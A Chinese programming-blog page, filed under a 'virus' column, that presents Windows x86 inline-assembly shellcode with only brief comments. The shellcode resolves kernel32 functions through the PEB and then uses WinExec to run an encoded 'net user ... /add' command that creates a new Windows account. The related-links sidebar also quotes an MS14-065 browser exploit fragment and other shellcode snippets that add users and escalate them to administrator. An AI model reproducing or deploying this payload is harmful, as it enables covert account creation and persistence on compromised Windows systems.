添加用户代码

最新推荐文章于 2022-02-23 15:02:25 发布
最新推荐文章于 2022-02-23 15:02:25 发布
阅读量1.8k 收藏
点赞数
分类专栏: 病毒 文章标签: search include c user 
#include <windows.h>

int main()
{
    __asm{
        push   ebp
        sub    esp, 0x40;
        mov    ebp, esp;

        push   ebp

        mov    eax, fs:0x30       ;PEB
        mov    eax, [eax+0x0c]    ;Ldr
        mov    esi, [eax+0x1c]    ;Flink
        lodsd
        mov    edi, [eax+0x08]    ;edi = kernel32.dll
           
        mov    eax, [edi+3Ch]     ;eax = PE首部
        mov    edx, [edi+eax+78h]
        add    edx, edi           ;edx = 输出表地址
        mov    ecx, [edx+18h]     ;ecx = 输出函数个数
        mov    ebx, [edx+20h]                
        add    ebx, edi           ;ebx = 函数名地址
       
search:
        dec     ecx
        mov     esi, [ebx+ecx*4]               
        add     esi, edi          ;依次找每个函数名称
        ;GetProcAddress
        mov     eax, 0x50746547
        cmp     [esi], eax        ;'PteG'
        jne     search
        mov     eax, 0x41636f72
        cmp     [esi+4], eax      ;'Acor'
        jne     search

        ;如果是GetProcA,表示找到了
        mov     ebx, [edx+24h]
        add     ebx, edi          ;ebx = 索引号地址
        mov     cx, [ebx+ecx*2] ;ecx = 计算出的索引号值
        mov     ebx, [edx+1Ch]
        add     ebx, edi          ;ebx = 函数地址的起始位置
        mov     eax, [ebx+ecx*4]
        add     eax, edi          ;用索引值,算GetProcAddress

        mov     [ebp+40h], eax    ;GetProcAddress的地址=ebp+40

        push    dword ptr 0x00636578   ;//构造WinExec
        push    dword ptr 0x456e6957
        push    esp
        push    edi
        call    [ebp+40h]              ;//执行GetProcAddress
        mov     [ebp+8h], eax          ;//存入WinExec的地址 到[ebp+8h]

   push    dword ptr 0x00000070   ;//构造Sleep
   push    dword ptr 0x65656C53   ;
        push    esp
        push    edi
        call    [ebp+40h]              ;//执行GetProcAddress
        mov     [ebp+12h], eax          ;//存入Sleep的地址 到[ebp+12h]

        push    dword ptr 0x00737365   ;//构造ExitProcess
        push    dword ptr 0x636f7250
        push    dword ptr 0x74697845
        push    esp
        push    edi
        call    [ebp+40h]              ;//执行GetProcAddress
        mov     [ebp+16h], eax         ;//存入ExitProcess的地址
   
  
   push    0
   push    dword ptr 0x00646461   ;add
   push    dword ptr 0x2F20776F   ;ow /
   push    dword ptr 0x6E736E69   ;insn
   push    dword ptr 0x786E696C   ;linx
   push    dword ptr 0x20776F6E   ;now
   push    dword ptr 0x736E6978   ;xins
   push    dword ptr 0x6E696C20   ; lin
   push    dword ptr 0x72657375   ;user
   push    dword ptr 0x2074656E   ;net

 

   push    esp
   Call    [ebp+8h]

        push    0                      ;ExitProcess
        call    [ebp+16h]      ;//最后要调用一次exitprocess,直接exit,防止异常
    }
    return 0;
}

 
lidatou
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
如何使用shell脚本执行添加用户
weixin_52658085的博客
04-30 1451
就可以看到运用shell脚本中来添加输入到user.txt文件中输入到文件里的用户名字了。sh test1.sh 也可以 . test1.sh 或者直接 sh test1.sh。zhangsan (随意输入要添加用户)可无限写。出来后我们给第一个test1.sh加入可执行权限。然后我们在编辑好一个名字叫user的txt文件。最后我们可以查看一下/etc/passwd。这样就是一个简简单单的shell脚本。然后我们wq保存退出。
关于arm-linux-gcc切换到root用户找不到命令的解决办法(command not found)
zhaodianle的专栏
09-25 1958
最近一直在学arm体系结构,也一直在用台式机的虚拟linux来对程序进行编译。今天突然心血来潮,想在自己的笔记本上跑一跑,装上arm-linux-系列并配置好.bashrc后发现在普通用户模式下使用arm-linux-gcc没有任何问题,但是当需要使用su来切换到root用户的时候再使用arm-linux-gcc进行编译,发现命令行提示command not found, 查看root用户的PAT
一个shellcode作用是添加Windows用户
05-06
一个shellcode,作用是添加Windows用户(同时包含shellcode和相应的汇编代码,绝对实用)
添加用户界面
12-10
添加用户界面,一个界面,最简单的添加用户,最易用的简单用户界面,
shellcode教程从新手到高手
weixin_34040079的博客
03-08 2202
P3nro5e · 2014/12/08 11:320x00 介绍与工具安装在这个站点中的这套教程目的在于利用汇编代码来生成自己的shellcode,它将有希望地被包含在"Project Shellcode Development Framework"(shellcode 开发框架项目)中Windows shellcode和linux shellcode 的不同点是什么?这个教程的一些内容是以在h...
UCenter 批量添加用户的php代码
10-28
有时候我们需要批量添加用户,只要把该php放进UCenter目录下,执行就可以了。
VB添加用户代码(VB源码下载:比较简单的VB代码)
02-21
标题中的“VB添加用户代码”指的是使用Visual Basic (VB)编程语言编写用于管理用户账户的代码,这通常涉及到用户注册或验证新用户信息的过程。在VB中,这种操作可能包括检查用户输入的数据(如用户名、密码)是否...
UCenter Home 站点添加统计代码
09-22
为了更好地了解网站的流量和用户行为,添加统计代码是一项重要的工作。以下将详细解释如何在UCenter Home站点上添加统计代码。 首先,你需要从各种提供免费统计服务的网站获取代码。常见的统计服务提供商有51la、...
jQuery自定义标签添加删除代码.zip
07-04
总的来说,"jQuery自定义标签添加删除代码"是一个关于前端开发实际应用的实例,涵盖了事件处理、DOM操作和用户交互设计等重要概念。熟练掌握这些技能对于任何前端开发者来说都是非常有价值的。通过学习和理解这段...
ASP添加代码
05-30
关于ASP添加代码块,详细地说明了使用ASP代码如何进行用户添加功能,仅供学习。
使用Spring表单标签实现新增用户信息
11-16
使用Spring表单标签实现新增用户信息使用Spring表单标签实现新增用户信息使用Spring表单标签实现新增用户信息使用Spring表单标签实现新增用户信息
添加用户
03-01
在linux添加用户添加密钥,添加密钥添加密钥
用户添加表单类
04-05
用户添加表单类
用户操作-用户添加操作代码实现
Leon_Jinhai_Sun的博客
02-22 738
用户添加 用户添加页面 user-add.jsp <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www....
MS14-065 添加用户并提升至管理员 EXP
CC's Blog
11-14 3664
MS14-065,添加用户并提升到管理员,IE only function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "net.exe","user test test /ad" shell.ShellExecute "net.exe","loc
缓冲区溢出攻击(二)添加用户
Dusk_Rain的博客
04-07 438
我们接着(一)继续实现 Shell code编写 #include <windows.h> int main() { LoadLibrary("msvcrt.dll"); system("net user y /add"); return 0; } 上诉代码可以实现再windows里添加一名标准用户“y" 但是要将上面的语句改为汇编语言,就必...
Linux下用shell脚本for循环添加用户
顺其自然
10-08 2631
#!/bin/bash for name in $(more users.list) do if [ -n "$name" ];then useradd -m $name echo echo $name"123" | passwd --stdin "$name" echo echo "user $name's password change" else echo echo '
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 8830
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
vscode添加用户代码片段
最新发布
09-08
要在VS Code中添加用户代码片段,你可以按照以下步骤进行操作: 1. 首先,点击左下角的设置图标,然后选择"用户代码片段"(user snippets)选项。你也可以点击右上角的"文件",然后选择"首选项",再选择"配置用户代码片段"。 2. 在弹出的选择框中,选择你想要添加代码片段的语言。如果你想为所有语言添加代码片段,可以选择"全局"。 3. 接下来,你需要创建一个新的代码片段文件。你可以选择已有的文件,或者创建一个新的文件。 4. 在代码片段文件中,你需要按照特定的格式编写代码片段。你可以根据你的需要自定义代码片段的触发词、代码块和变量。详细的配置方式可以参考引用提供的链接中的示例。 5. 保存你的代码片段文件,并重新启动VS Code。 6. 现在,你可以在你的代码中使用你添加代码片段了。当你输入触发词时,VS Code会自动提示你相应的代码片段。 用户代码片段是VS Code编辑器的一个功能,它可以根据开发者的需要单独设置,提高开发人员的开发效率。<span class="em">1</span><span class="em">2</span><span class="em">3</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值